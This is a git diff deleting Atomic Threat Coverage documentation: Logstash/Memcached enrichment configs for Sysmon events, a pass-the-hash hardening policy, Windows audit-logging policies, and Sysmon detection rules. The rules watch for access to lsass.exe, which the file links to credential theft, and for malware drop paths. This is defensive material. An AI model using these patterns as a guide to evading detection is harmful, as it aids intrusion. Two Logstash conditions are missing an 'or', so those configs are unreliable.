-| **New fields**     |<ul><li>event_data.ParentIntegrityLevel</li><li>event_data.ParentUser</li><li>event_data.ParentOfParentImage</li><li>ParentIntegrityLevel</li><li>ParentUser</li><li>ParentOfParentImage</li></ul> |
-
-
-### Config
-
-We can use Logstash to enrich Sysmon Event ID 1 with data cached in Memcached. 
-Here is the config example:
-
-```
-filter {
-  # Get previously cached information about parent process from cache to enrich process creation events (event id 1)
-  if [source_name] == "Microsoft-Windows-Sysmon" and [event_id] == 1 and [event_data][ParentProcessGuid] {
-    # Enrich event with additional information about process
-    memcached {
-      # get info from cache
-      hosts => ["127.0.0.1:11211"]
-      get => {
-        "%{computer_name}_%{[event_data][ParentProcessGuid]}" => "[@metadata][processinfo]"
-      }
-    }
-    if [@metadata][processinfo] {
-      kv {
-        source => "[@metadata][processinfo]"
-        target => "[@metadata][processinfo]"
-        field_split => ","
-        value_split => "="
-      }
-      if [@metadata][processinfo][ParentImage] {
-        mutate {
-          add_field => { "[event_data][ParentIntegrityLevel]" => "%{[@metadata][processinfo][IntegrityLevel]}" }
-          add_field => { "[event_data][ParentUser]" => "%{[@metadata][processinfo][User]}" }
-          add_field => { "[event_data][ParentOfParentImage]" => "%{[@metadata][processinfo][ParentImage]}" }
-        }
-      }
-    }
-  }
-}
-```
diff --git a/Atomic_Threat_Coverage/Enrichments/EN0003_enrich_other_sysmon_events_with_event_id_1_data.md b/Atomic_Threat_Coverage/Enrichments/EN0003_enrich_other_sysmon_events_with_event_id_1_data.md
deleted file mode 100644
index de45cf9..0000000
--- a/Atomic_Threat_Coverage/Enrichments/EN0003_enrich_other_sysmon_events_with_event_id_1_data.md
+++ /dev/null
@@ -1,60 +0,0 @@
-| Title              | EN0003_enrich_other_sysmon_events_with_event_id_1_data |
-|:-------------------|:-----------------------------------------------------------------------------------------------------------------|
-| **Description**    | Enrich other Sysmon Events with data from Events ID 1 (Process Create)  — Integrity Level, User, Parent Image and CommandLine fields. |
-| **Data Needed**    |<ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul> |
-| **Data to enrich** |<ul><li>[DN0006_2_windows_sysmon_process_changed_a_file_creation_time](../Data_Needed/DN0006_2_windows_sysmon_process_changed_a_file_creation_time.md)</li><li>[DN0007_3_windows_sysmon_network_connection](../Data_Needed/DN0007_3_windows_sysmon_network_connection.md)</li><li>[DN0009_5_windows_sysmon_process_terminated](../Data_Needed/DN0009_5_windows_sysmon_process_terminated.md)</li><li>[DN0011_7_windows_sysmon_image_loaded](../Data_Needed/DN0011_7_windows_sysmon_image_loaded.md)</li><li>[DN0013_9_windows_sysmon_RawAccessRead](../Data_Needed/DN0013_9_windows_sysmon_RawAccessRead.md)</li><li>[DN0015_11_windows_sysmon_FileCreate](../Data_Needed/DN0015_11_windows_sysmon_FileCreate.md)</li><li>[DN0016_12_windows_sysmon_RegistryEvent](../Data_Needed/DN0016_12_windows_sysmon_RegistryEvent.md)</li><li>[DN0017_13_windows_sysmon_RegistryEvent](../Data_Needed/DN0017_13_windows_sysmon_RegistryEvent.md)</li><li>[DN0018_14_windows_sysmon_RegistryEvent](../Data_Needed/DN0018_14_windows_sysmon_RegistryEvent.md)</li><li>[DN0019_15_windows_sysmon_FileCreateStreamHash](../Data_Needed/DN0019_15_windows_sysmon_FileCreateStreamHash.md)</li><li>[DN0020_17_windows_sysmon_PipeEvent](../Data_Needed/DN0020_17_windows_sysmon_PipeEvent.md)</li><li>[DN0021_18_windows_sysmon_PipeEvent](../Data_Needed/DN0021_18_windows_sysmon_PipeEvent.md)</li></ul> |
-| **References**     |<ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment)</li></ul> |
-| **Author**         | Teymur Kheirkhabarov           |
-| **Requirements**   |<ul><li>[EN0001_cache_sysmon_event_id_1_info](../Enrichments/EN0001_cache_sysmon_event_id_1_info.md)</li></ul>> |
-| **New fields**     |<ul><li>event_data.IntegrityLevel</li><li>event_data.User</li><li>event_data.CommandLine</li><li>event_data.ParentImage</li><li>IntegrityLevel</li><li>User</li><li>CommandLine</li><li>ParentImage</li></ul> |
-
-
-### Config
-
-We can use Logstash to enrich other Sysmon Events with data from Sysmon Event ID 1, cached in Memcached. 
-Here is the config example:
-
-```
-filter {
-  # Add additional information from cache, that is available only in Process Creation event (User, IL...)
-  if [source_name] == "Microsoft-Windows-Sysmon" and [event_id] != 1 and [event_data][ProcessGuid] {
-    # Enrich event with additional information about process
-    memcached {
-      # get info from cache
-      hosts => ["127.0.0.1:11211"]
-      get => {
-        "%{computer_name}_%{[event_data][ProcessGuid]}" => "[@metadata][processinfo]"
-      }
-    }
-    if [@metadata][processinfo] {
-      kv {
-        source => "[@metadata][processinfo]"
-        target => "[@metadata][processinfo]"
-        field_split => ","
-        value_split => "="
-      }
-      # Enrich event
-      if [@metadata][processinfo][IntegrityLevel] {
-        mutate {
-          add_field => { "[event_data][IntegrityLevel]" => "%{[@metadata][processinfo][IntegrityLevel]}" }
-        }
-      }
-      if [@metadata][processinfo][User] {
-        mutate {
-          add_field => { "[event_data][User]" => "%{[@metadata][processinfo][User]}" }
-        }
-      }
-      if [@metadata][processinfo][CommandLine] {
-        mutate {
-          add_field => { "[event_data][CommandLine]" => "%{[@metadata][processinfo][CommandLine]}" }
-        }
-      }
-      if [@metadata][processinfo][ParentImage] {
-        mutate {
-          add_field => { "[event_data][ParentImage]" => "%{[@metadata][processinfo][ParentImage]}" }
-        }
-      }
-    }
-  }
-}
-```
diff --git a/Atomic_Threat_Coverage/Enrichments/EN0004_enrich_sysmon_event_id_11_with_TargetFilePathFingerprint.md b/Atomic_Threat_Coverage/Enrichments/EN0004_enrich_sysmon_event_id_11_with_TargetFilePathFingerprint.md
deleted file mode 100644
index 734e90f..0000000
--- a/Atomic_Threat_Coverage/Enrichments/EN0004_enrich_sysmon_event_id_11_with_TargetFilePathFingerprint.md
+++ /dev/null
@@ -1,32 +0,0 @@
-| Title              | EN0004_enrich_sysmon_event_id_11_with_TargetFilePathFingerprint |
-|:-------------------|:-----------------------------------------------------------------------------------------------------------------|
-| **Description**    | Enrich Sysmon Event ID 11 (File Create) calculating TargetFilePathFingerprint |
-| **Data Needed**    |<ul><li>[DN0015_11_windows_sysmon_FileCreate](../Data_Needed/DN0015_11_windows_sysmon_FileCreate.md)</li></ul> |
-| **Data to enrich** |<ul><li>[DN0015_11_windows_sysmon_FileCreate](../Data_Needed/DN0015_11_windows_sysmon_FileCreate.md)</li></ul> |
-| **References**     |<ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment)</li></ul> |
-| **Author**         | Teymur Kheirkhabarov           |
-| **Requirements**   | None |
-| **New fields**     |<ul><li>event_data.TargetFilePathFingerprint</li><li>TargetFilePathFingerprint</li></ul> |
-
-
-### Config
-
-We can use Logstash to enrich Sysmon Event ID 11, calculating TargetFilePathFingerprint
-(md5 hash of computer name and absolute filepath) via Ruby filter plugin.
-Here is the config example:
-
-```
-filter {
-  # calculating filepath fingerprint
-  if [event_id] == 11 and ([event_data][TargetFilename] =~ ".exe" or [event_data][TargetFilename] =~ ".dll" [event_data][TargetFilename] =~ ".sys" ) {
-    ruby { 
-      code => "
-              require 'digest'
-              md5 = Digest::MD5.new
-              md5.update event.get('[computer_name]').downcase+event.get('[event_data][TargetFilename]').downcase
-              event.set('[event_data][TargetFilePathFingerprint]', md5.hexdigest)
-              "
-    }
-  }
-}
-```
diff --git a/Atomic_Threat_Coverage/Enrichments/EN0005_cache_TargetFilePathFingerprint_from_enriched_sysmon_event_id_11.md b/Atomic_Threat_Coverage/Enrichments/EN0005_cache_TargetFilePathFingerprint_from_enriched_sysmon_event_id_11.md
deleted file mode 100644
index b317794..0000000
--- a/Atomic_Threat_Coverage/Enrichments/EN0005_cache_TargetFilePathFingerprint_from_enriched_sysmon_event_id_11.md
+++ /dev/null
@@ -1,30 +0,0 @@
-| Title              | EN0005_cache_TargetFilePathFingerprint_from_enriched_sysmon_event_id_11 |
-|:-------------------|:-----------------------------------------------------------------------------------------------------------------|
-| **Description**    | Cache field "TargetFilePathFingerprint" from enriched Sysmon Event ID 11 (File Create). |
-| **Data Needed**    |<ul><li>[DN0015_11_windows_sysmon_FileCreate](../Data_Needed/DN0015_11_windows_sysmon_FileCreate.md)</li></ul> |
-| **Data to enrich** | None |
-| **References**     |<ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment)</li></ul> |
-| **Author**         | Teymur Kheirkhabarov           |
-| **Requirements**   |<ul><li>[EN0004_enrich_sysmon_event_id_11_with_TargetFilePathFingerprint](../Enrichments/EN0004_enrich_sysmon_event_id_11_with_TargetFilePathFingerprint.md)</li></ul>> |
-| **New fields**     | None |
-
-
-### Config
-
-We can use Logstash to cache data in Memcached. 
-Here is the config example:
-
-```
-filter {
-  # cahce TargetFilePathFingerprint field 
-  if [event_id] == 11 and ([event_data][TargetFilename] =~ ".exe" or [event_data][TargetFilename] =~ ".dll" [event_data][TargetFilename] =~ ".sys" ) {
-    memcached { 
-      hosts => ["127.0.0.1:11211"]
-      set => {
-        "[@metadata][processinfo]" => "%{[event_data][TargetFilePathFingerprint]}"
-      }
-      ttl => 86400 # 24 hours
-    }
-  }
-}
-```
diff --git a/Atomic_Threat_Coverage/Hardening_Policies/HP_0001_windows_LocalAccountTokenFilterPolicy.md b/Atomic_Threat_Coverage/Hardening_Policies/HP_0001_windows_LocalAccountTokenFilterPolicy.md
deleted file mode 100644
index 4f26183..0000000
--- a/Atomic_Threat_Coverage/Hardening_Policies/HP_0001_windows_LocalAccountTokenFilterPolicy.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title                     | HP_0001_windows_LocalAccountTokenFilterPolicy                                                                          |
-|:--------------------------|:-------------------------------------------------------------------------------------|
-| **Description**           | This Hardening Policy applies UAC token-filtering to local accounts on network logons.  Membership in powerful group such as Administrators is disabled and powerful privileges are  removed from the resulting access token. This configures the LocalAccountTokenFilterPolicy  registry value to 0. This is the default behavior for Windows                                                                    |
-| **ATT&amp;CK Tactic**     | <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique**  | <ul><li>[T1075: Pass the Hash](https://attack.mitre.org/techniques/T1075)</li></ul>  |
-| **ATT&amp;CK Mitigation** | <ul><li>[M1052: User Account Control](https://attack.mitre.org/mitigations/M1052)</li></ul>  |
-| **Platform**              | <ul><li>Windows</li></ul>                   |
-| **Minimum Version**       | <ul><li>Windows Vista</li><li>Windows Server 2008</li></ul>      |
-| **References**            | <ul><li>[https://support.microsoft.com/en-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows](https://support.microsoft.com/en-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows)</li><li>[https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/](https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)</li><li>[https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/](https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/)</li><li>[https://github.com/nsacyber/Windows-Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml](https://github.com/nsacyber/Windows-Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml)</li></ul>      |
-
-
-## Configuration
-
-Steps to implement hardening policy with GPO (requires security baselines download and place into `%SystemRoot%\PolicyDefinitions`):
-```
-Computer Configuration > 
-Administrative Templates > 
-SCM: Pass the Hash Mitigations >
-Apply UAC restrictions to local accounts on network logons
-```
-
-Enabling via registry key:
-```
-reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 0 /f
-```
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0001_windows_audit_process_creation.md b/Atomic_Threat_Coverage/Logging_Policies/LP0001_windows_audit_process_creation.md
deleted file mode 100644
index 2fbc211..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0001_windows_audit_process_creation.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title            | LP0001_windows_audit_process_creation                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Process Creation determines whether the operating  system generates audit events when a process is created (starts).  These audit events can help you track user activity and understand  how a computer is being used. Information includes the name of the  program or the user that created the process.                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Medium                                                                    |
-| **EventID**      | <ul><li>4688</li><li>4696</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-process-creation.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-process-creation.md)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Advanced Audit Configuration:
-```
-Computer Configuration >
-Policies >
-Windows Settings >
-Security Settings >
-Advanced Audit Configuration >
-Detailed Tracking >
-Audit Process Creation (Success)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0002_windows_audit_process_creation_with_commandline.md b/Atomic_Threat_Coverage/Logging_Policies/LP0002_windows_audit_process_creation_with_commandline.md
deleted file mode 100644
index 359b5f5..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0002_windows_audit_process_creation_with_commandline.md
+++ /dev/null
@@ -1,27 +0,0 @@
-| Title            | LP0002_windows_audit_process_creation_with_commandline                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Process Creation determines whether the operating  system generates audit events when a process is created (starts).  These audit events can help you track user activity and understand  how a computer is being used. Information includes the name of the  program or the user that created the process (incl. commanline of new process).                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Medium                                                                    |
-| **EventID**      | <ul><li>4688</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-process-creation.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-process-creation.md)</li><li>[https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Advanced Audit Configuration:
-```
-Computer Configuration > 
-Administrative Templates > 
-System > 
-Audit Process Creation >
-Include command line in process creation events (Enable)
-```
-Enabling via registry key:
-```
-reg add "hklm\software\microsoft\windows\currentversion\policies\system\audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0003_windows_sysmon_process_creation.md b/Atomic_Threat_Coverage/Logging_Policies/LP0003_windows_sysmon_process_creation.md
deleted file mode 100644
index c2559df..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0003_windows_sysmon_process_creation.md
+++ /dev/null
@@ -1,22 +0,0 @@
-| Title            | LP0003_windows_sysmon_process_creation                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | The process creation event provides extended information  about a newly created process. The full command line provides  context on the process execution. The ProcessGUID field is a  unique value for this process across a domain to make event  correlation easier. The hash is a full hash of the file with  the algorithms in the HashType field.                                                               |
-| **Default**      | Partially (Other)                                                                   |
-| **Event Volume** | Medium                                                                    |
-| **EventID**      | <ul><li>1</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)</li></ul> |
-
-
-
-## Configuration
-
-Sysmon event id 1 enabled by default, but include only sha1 hashing function.
-Sysmon config to enable md5, sha1, sha256 and imphash functions:
-```
-<Sysmon schemaversion="4.00">
-  <HashAlgorithms>md5,sha1,sha256,imphash</HashAlgorithms>
-</Sysmon>
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0004_windows_audit_logon.md b/Atomic_Threat_Coverage/Logging_Policies/LP0004_windows_audit_logon.md
deleted file mode 100644
index d209ba2..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0004_windows_audit_logon.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0004_windows_audit_logon                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Logon determines whether the operating system generates audit  events when a user attempts to log on to a computer                                                               |
-| **Default**      | Partially (Success)                                                                   |
-| **Event Volume** | Medium                                                                    |
-| **EventID**      | <ul><li>4624</li><li>4625</li><li>4648</li><li>4675</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-logon.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-logon.md)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Advanced Audit Configuration:
-```
-Computer Configuration > 
-Policies > 
-Windows Settings > 
-Security Settings > 
-Advanced Audit Policies Configuration > 
-Audit Policies > 
-Logon/Logoff
-Audit logon (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0005_windows_sysmon_network_connection.md b/Atomic_Threat_Coverage/Logging_Policies/LP0005_windows_sysmon_network_connection.md
deleted file mode 100644
index 1eaca94..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0005_windows_sysmon_network_connection.md
+++ /dev/null
@@ -1,18 +0,0 @@
-| Title            | LP0005_windows_sysmon_network_connection                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | The network connection event logs TCP/UDP connections on the machine.  It is disabled by default. Each connection is linked to a process  through the ProcessId and ProcessGUID fields. The event also contains  the source and destination host names IP addresses, port numbers and IPv6 status.                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>3</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)</li></ul> |
-
-
-
-## Configuration
-
-Sysmon event id 3 is disabled by default. 
-It can be enabled by specyfying -n option
-However due to high level of produced logs it should be filtred with configuration file
-Sample configuration might be found here: https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0006_windows_sysmon_image_loaded.md b/Atomic_Threat_Coverage/Logging_Policies/LP0006_windows_sysmon_image_loaded.md
deleted file mode 100644
index 99d4406..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0006_windows_sysmon_image_loaded.md
+++ /dev/null
@@ -1,18 +0,0 @@
-| Title            | LP0006_windows_sysmon_image_loaded                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | The image loaded event logs when a module is loaded in a specific process.  This event is disabled by default and needs to be configured with the –l option.  It indicates the process in which the module is loaded, hashes and signature information.  The signature is created asynchronously for performance reasons and indicates if the file was removed after loading.  This event should be configured carefully, as monitoring all image load events will generate a large number of events.                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>7</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)</li></ul> |
-
-
-
-## Configuration
-
-Sysmon event id 7 is disabled by default. 
-It can be enabled by specyfying -l option
-However due to high level of produced logs it should be filtred with configuration file
-Sample configuration might be found here: https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0007_windows_sysmon_ProcessAccess.md b/Atomic_Threat_Coverage/Logging_Policies/LP0007_windows_sysmon_ProcessAccess.md
deleted file mode 100644
index 6772e27..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0007_windows_sysmon_ProcessAccess.md
+++ /dev/null
@@ -1,28 +0,0 @@
-| Title            | LP0007_windows_sysmon_ProcessAccess                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | The process accessed event reports when a process opens another process,  an operation that’s often followed by information queries or reading and writing the address  space of the target process. This enables detection of hacking tools that read the memory  contents of processes like Local Security Authority (Lsass.exe) in order to steal credentials for use in Pass-the-Hash  attacks. Enabling it can generate significant amounts of logging if there are diagnostic utilities active  that repeatedly open processes to query their state, so it generally should only be done so with filters  that remove expected accesses.                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>10</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)</li></ul> |
-
-
-
-## Configuration
-
-Sysmon event id 10 is disabled by default. 
-It can be enabled by specyfying configuration
-However due to high level of produced logs it should be filtred with configuration file
-Sample configuration:
-```
-  <ProcessAccess onmatch="include">
-    <TargetImage condition="is">C:\Windows\system32\lsass.exe</TargetImage>
-  </ProcessAccess>
-  <ProcessAccess onmatch="exclude">
-    <SourceImage condition="is">C:\windows\system32\wbem\wmiprvse.exe</SourceImage>
-    <SourceImage condition="is">C:\windows\system32\svchost.exe</SourceImage>
-  </ProcessAccess>
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0008_windows_sysmon_FileCreate.md b/Atomic_Threat_Coverage/Logging_Policies/LP0008_windows_sysmon_FileCreate.md
deleted file mode 100644
index 6ff93dd..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0008_windows_sysmon_FileCreate.md
+++ /dev/null
@@ -1,93 +0,0 @@
-| Title            | LP0008_windows_sysmon_FileCreate                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | File create operations are logged when a file is created or overwritten. This event is useful for monitoring autostart locations, like the Startup folder, as well as temporary and download directories, which are common places malware drops during initial infection.                                                               |
-| **Default**      | Partially (Other)                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>11</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)</li></ul> |
-
-
-
-## Configuration
-
-Sysmon event id 11 is enabled by default however default configuration might not be sufficient.
-Sample configuration providing much better visibility might be found here: https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml
-
-```
-  <!--DATA: UtcTime, ProcessGuid, ProcessId, Image, TargetFilename, CreationUtcTime-->
-  <FileCreate onmatch="include">
-    <TargetFilename condition="contains">\Start Menu</TargetFilename> <!--Microsoft:Windows: Startup links and shortcut modification [ https://attack.mitre.org/wiki/Technique/T1023 ] -->
-    <TargetFilename condition="contains">\Startup\</TargetFilename> <!--Microsoft:Office: Changes to user's auto-launched files and shortcuts-->
-    <TargetFilename condition="contains">\Content.Outlook\</TargetFilename> <!--Microsoft:Outlook: attachments-->
-    <TargetFilename condition="contains">\Downloads\</TargetFilename> <!--Downloaded files. Does not include "Run" files in IE-->
-    <TargetFilename condition="end with">.application</TargetFilename> <!--Microsoft:ClickOnce: [ https://blog.netspi.com/all-you-need-is-one-a-clickonce-love-story/ ] -->
-    <TargetFilename condition="end with">.appref-ms</TargetFilename> <!--Microsoft:ClickOnce application | Credit @ion-storm -->
-    <TargetFilename condition="end with">.bat</TargetFilename> <!--Batch scripting-->
-    <TargetFilename condition="end with">.chm</TargetFilename>
-    <TargetFilename condition="end with">.cmd</TargetFilename> <!--Batch scripting: Batch scripts can also use the .cmd extension | Credit: @mmazanec -->
-    <TargetFilename condition="end with">.cmdline</TargetFilename> <!--Microsoft:dotNet: Executed by cvtres.exe-->
-    <TargetFilename condition="end with">.docm</TargetFilename> <!--Microsoft:Office:Word: Macro-->
-    <TargetFilename condition="end with">.exe</TargetFilename> <!--Executable-->
-    <TargetFilename condition="end with">.jar</TargetFilename> <!--Java applets-->
-    <TargetFilename condition="end with">.jnlp</TargetFilename> <!--Java applets-->
-    <TargetFilename condition="end with">.jse</TargetFilename> <!--Scripting [ Example: https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Mal~Phires-C/detailed-analysis.aspx ] -->
-    <TargetFilename condition="end with">.hta</TargetFilename> <!--Scripting-->
-    <TargetFilename condition="end with">.pptm</TargetFilename> <!--Microsoft:Office:Word: Macro-->
-    <TargetFilename condition="end with">.ps1</TargetFilename> <!--PowerShell [ More information: http://www.hexacorn.com/blog/2014/08/27/beyond-good-ol-run-key-part-16/ ] -->
-    <TargetFilename condition="end with">.sys</TargetFilename> <!--System driver files-->
-    <TargetFilename condition="end with">.scr</TargetFilename> <!--System driver files-->
-    <TargetFilename condition="end with">.vbe</TargetFilename> <!--VisualBasicScripting-->
-    <TargetFilename condition="end with">.vbs</TargetFilename> <!--VisualBasicScripting-->
-    <TargetFilename condition="end with">.xlsm</TargetFilename> <!--Microsoft:Office:Word: Macro-->
-    <TargetFilename condition="end with">proj</TargetFilename><!--Microsoft:MSBuild:Script: More information: https://twitter.com/subTee/status/885919612969394177-->
-    <TargetFilename condition="end with">.sln</TargetFilename><!--Microsoft:MSBuild:Script: More information: https://twitter.com/subTee/status/885919612969394177-->
-    <TargetFilename condition="begin with">C:\Users\Default</TargetFilename> <!--Microsoft:Windows: Changes to default user profile-->
-    <TargetFilename condition="begin with">C:\Windows\system32\Drivers</TargetFilename> <!--Microsoft: Drivers dropped here-->
-    <TargetFilename condition="begin with">C:\Windows\SysWOW64\Drivers</TargetFilename> <!--Microsoft: Drivers dropped here-->
-    <TargetFilename condition="begin with">C:\Windows\system32\GroupPolicy\Machine\Scripts</TargetFilename> <!--Group policy [ More information: http://www.hexacorn.com/blog/2017/01/07/beyond-good-ol-run-key-part-52/ ] -->
-    <TargetFilename condition="begin with">C:\Windows\system32\GroupPolicy\User\Scripts</TargetFilename> <!--Group policy [ More information: http://www.hexacorn.com/blog/2017/01/07/beyond-good-ol-run-key-part-52/ ] -->
-    <TargetFilename condition="begin with">C:\Windows\system32\Wbem</TargetFilename> <!--Microsoft:WMI: [ More information: http://2014.hackitoergosum.org/slides/day1_WMI_Shell_Andrei_Dumitrescu.pdf ] -->
-    <TargetFilename condition="begin with">C:\Windows\SysWOW64\Wbem</TargetFilename> <!--Microsoft:WMI: [ More information: http://2014.hackitoergosum.org/slides/day1_WMI_Shell_Andrei_Dumitrescu.pdf ] -->
-    <TargetFilename condition="begin with">C:\Windows\system32\WindowsPowerShell</TargetFilename> <!--Microsoft:Powershell: Look for modifications for persistence [ https://www.malwarearchaeology.com/cheat-sheets ] -->
-    <TargetFilename condition="begin with">C:\Windows\SysWOW64\WindowsPowerShell</TargetFilename> <!--Microsoft:Powershell: Look for modifications for persistence [ https://www.malwarearchaeology.com/cheat-sheets ] -->
-    <TargetFilename condition="begin with">C:\Windows\Tasks\</TargetFilename> <!--Microsoft:ScheduledTasks [ https://attack.mitre.org/wiki/Technique/T1053 ] -->
-    <TargetFilename condition="begin with">C:\Windows\system32\Tasks</TargetFilename> <!--Microsoft:ScheduledTasks [ https://attack.mitre.org/wiki/Technique/T1053 ] -->
-    <!--Windows application compatibility-->
-    <TargetFilename condition="begin with">C:\Windows\AppPatch\Custom</TargetFilename> <!--Microsoft:Windows: Application compatibility shims [ https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html ] -->
-    <TargetFilename condition="contains">VirtualStore</TargetFilename> <!--Microsoft:Windows: UAC virtualization [ https://blogs.msdn.microsoft.com/oldnewthing/20150902-00/?p=91681 ] -->
-    <!--Exploitable file names-->
-    <TargetFilename condition="end with">.xls</TargetFilename> <!--Legacy Office files are often used for attacks-->
-    <TargetFilename condition="end with">.ppt</TargetFilename> <!--Legacy Office files are often used for attacks-->
-    <TargetFilename condition="end with">.rft</TargetFilename> <!--RTF files often 0day malware vectors when opened by Office-->
-  </FileCreate>
-
-  <FileCreate onmatch="exclude">
-    <!--SECTION: Microsoft-->
-    <Image condition="is">C:\Program Files (x86)\EMET 5.5\EMET_Service.exe</Image> <!--Microsoft:EMET: Writes to C:\Windows\AppPatch\-->
-    <!--SECTION: Microsoft:Office-->
-    <TargetFilename condition="is">C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask</TargetFilename>
-    <!--SECTION: Microsoft:Office:Click2Run-->
-    <Image condition="is">C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe</Image> <!-- Microsoft:Office Click2Run-->
-    <!--SECTION: Microsoft:Windows-->
